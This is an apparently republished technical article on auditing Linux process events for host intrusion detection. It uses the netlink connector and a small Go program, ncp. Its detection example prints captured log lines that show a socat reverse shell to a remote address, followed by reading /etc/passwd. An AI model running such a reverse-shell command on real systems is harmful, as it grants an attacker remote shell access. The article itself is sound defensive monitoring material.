Real-Time Linux Process Auditing with Netlink Connector and ncp
This article explains how the Linux netlink connector, together with a lightweight user‑space ncp program, can audit all process events in real time, enabling detailed host security monitoring, detection of intrusion behaviors such as reverse shells, and reconstruction of attack chains through captured exec, fork, and exit data.
1 Introduction
Host security is the most business‑close component of a defense‑in‑depth system. Most attacks manifest as processes: attackers execute commands that create processes, which open network connections and may read/write files. Auditing process events therefore provides the most important data for intrusion detection and anomaly analysis.
2 Implementation Scheme
The third solution uses the Linux netlink connector to audit process events. The kernel provides this interface, and a lightweight user‑space ncp program captures all events with minimal host impact.
2.1 Linux Connector
The connector is a netlink communication mechanism for user‑kernel IPC, commonly used for the process‑event connector.
Supported since kernel 2.6.15; verify CONFIG_CONNECTOR and CONFIG_PROC_EVENTS are enabled.
CONFIG_CONNECTOR=y
CONFIG_PROC_EVENTS=y2.2 Connector Kernel Module
Core code resides in driver/connector/connector.c and driver/connector/cn_queue.c.
int cn_add_callback(struct cb_id *id, const char *name,
void (*callback)(struct cn_msg *,
struct netlink_skb_parms *))
void cn_del_callback(struct cb_id *id)cn_add_callbackregisters a new connector instance and its callback function.
cn_add_callback(&cn_proc_event_id,
"cn_proc",
&cn_proc_mcast_ctl)
static void cn_proc_mcast_ctl(struct cn_msg *msg,
struct netlink_skb_parms *nsp){
*
mc_op = (enum proc_cn_mcast_op *)msg->data;
switch (*mc_op) {
case PROC_CN_MCAST_LISTEN:
atomic_inc(&proc_event_num_listeners);
break;
case PROC_CN_MCAST_IGNORE:
atomic_dec(&proc_event_num_listeners);
break;
default:
err = EINVAL;
break;
}
}2.3 Process Events
Implementation is in drivers/connector/cn_proc.c.
int cn_netlink_send(struct cn_msg *msg, u32 __group, gfp_t gfp_mask)System calls sys_fork, sys_exec, and sys_exit eventually invoke cn_netlink_send to deliver messages to user space.
sys_fork->do_fork->copy_process->proc_fork_connector->cn_netlink_send
sys_exec->do_execve->do_execve_common->search_binary_handler->proc_exec_connector->cn_netlink_send
sys_exit->do_exit->proc_exit_connector->cn_netlink_sendThe connectors extract information from the kernel task_struct and package it into netlink messages.
void proc_fork_connector(struct task_struct *task) {
ev->what = PROC_EVENT_FORK;
parent = rcu_dereference(task->real_parent);
ev->event_data.fork.parent_pid = parent->pid;
ev->event_data.fork.parent_tgid = parent->tgid;
ev->event_data.fork.child_pid = task->pid;
ev->event_data.fork.child_tgid = task->tgid;
}
void proc_exec_connector(struct task_struct *task){
ev->what = PROC_EVENT_EXEC;
ev->event_data.exec.process_pid = task->pid;
ev->event_data.exec.process_tgid = task->tgid;
}
void proc_exit_connector(struct task_struct *task){
ev->what = PROC_EVENT_EXIT;
ev->event_data.exit.process_pid = task->pid;
ev->event_data.exit.process_tgid = task->tgid;
ev->event_data.exit.exit_code = task->exit_code;
ev->event_data.exit.exit_signal = task->exit_signal;
}3 ncp User‑Space Implementation
3.1 Connection Establishment
fd, err := syscall.Socket(syscall.AF_NETLINK, syscall.SOCK_DGRAM, syscall.NETLINK_CONNECTOR)
lsa.Family = syscall.AF_NETLINK
lsa.Groups = C.CN_IDX_PROC
if err = syscall.Bind(fd, &lsa); err != nil {
syscall.Close(fd)
}The socket uses AF_NETLINK and protocol NETLINK_CONNECTOR; bind sets the family and groups to receive process events.
3.2 Open Connector Switch
msg.idx = C.CN_IDX_PROC
msg.val = C.CN_VAL_PROC
msg.len = 4
msg.op = C.PROC_CN_MCAST_LISTEN
syscall.Sendto(fd, &msg, 0, &lca)This constructs a netlink control message that tells the kernel module to enable the process‑event connector.
3.3 Receive Process Events
for {
nr, _, err := syscall.Recvfrom(self.fd, rb, 0)
ev := parseEvent(nr)
switch ev {
case C.PROC_EVENT_FORK:
get_exe(pid)
get_cmdline(pid)
get_cwd(pid)
case C.PROC_EVENT_EXEC:
// handle exec
case C.PROC_EVENT_EXIT:
// handle exit
}
}Fork, exec, and exit events provide pid and tid; additional information such as exe, cmdline, and cwd can be obtained from /proc/[pid]/.
3.4 Reverse‑Shell Detection Example
Using a common reverse‑shell scenario with socat and bash, ncp captured five process events (three Exec, two Fork).
Exec: {tid:5860 pid:5860} -> process exe:/usr/bin/socat, cmdline:socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:172.18.5.16:80, cwd:/home/root
Fork: {ptid:5860 ppid:5860 tid:5861 pid:5861} -> process exe:/usr/bin/socat, cmdline:socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:172.18.5.16:80, cwd:/home/root
Exec: {tid:5861 pid:5861} -> process exe:/usr/bin/bash, cmdline:bash -li, cwd:/home/root
Fork: {ptid:5861 ppid:5861 tid:5918 pid:5918} -> process exe:/usr/bin/bash, cmdline:bash -li, cwd:/home/root
Exec: {tid:5918 pid:5918} -> process exe:/usr/bin/cat, cmdline:cat /etc/passwd, cwd:/home/rootAnalysis of the Exec events shows the attacker used socat to spawn a bash shell, then executed cat /etc/passwd, illustrating how process‑event data can reconstruct the full intrusion chain.
4 Conclusion
Combining the Linux connector with the lightweight ncp user‑space program enables real‑time auditing of Linux process events. It collects dimensions such as exe, cmdline, status, fd, and stack, providing essential data for host‑level intrusion detection and rapid reconstruction of attack behaviors.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.